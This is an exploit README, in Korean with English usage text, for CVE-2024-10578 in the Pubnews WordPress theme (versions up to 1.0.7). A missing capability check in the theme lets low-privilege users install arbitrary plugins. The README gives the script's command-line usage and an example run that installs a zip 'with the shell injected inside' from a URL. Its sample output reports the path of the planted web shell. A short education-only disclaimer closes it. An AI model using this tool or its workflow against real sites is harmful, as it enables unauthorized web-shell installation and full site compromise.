
Pubnews <= 1.0.7 - 인증되지 않은 임의의 플러그인 설치
WordPress용 Pubnews 테마는 1.0.7 이하 모든 버전에서 pubnews_importer_plugin_action_for_notice() 함수에 대한 기능 확인이 누락되어 인증되지 않은 임의의 플러그인 설치에 취약합니다. 이 취약점으로 인해 구독자 수준 이상의 접근 권한을 가진 인증된 공격자가 임의의 플러그인을 설치하여 다른 취약점을 악용할 수 있습니다.
이 스크립트는 Pubnews 테마의 취약점을 악용하여 제공된 URL에서 임의의 플러그인을 설치합니다. 플러그인에는 악성 셸이나 다른 페이로드가 포함될 수 있습니다.
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi
options:
-h, --help show this help message and exit
-u, --url URL The URL of the WordPress site
-un, --username USERNAME
The username for WordPress login
-p, --password PASSWORD
The password for WordPress login
-url_zip, --plugin_url PLUGIN_URL
The plugin URL to install (must be a zip file with the shell injected inside)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/
이 스크립트는 교육 목적으로만 제공됩니다. 저자는 불법 활동에 이 스크립트를 사용하는 것을 용납하지 않습니다. 책임감 있게 사용하고 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.
제공: Nxploited | Khaled Alenazi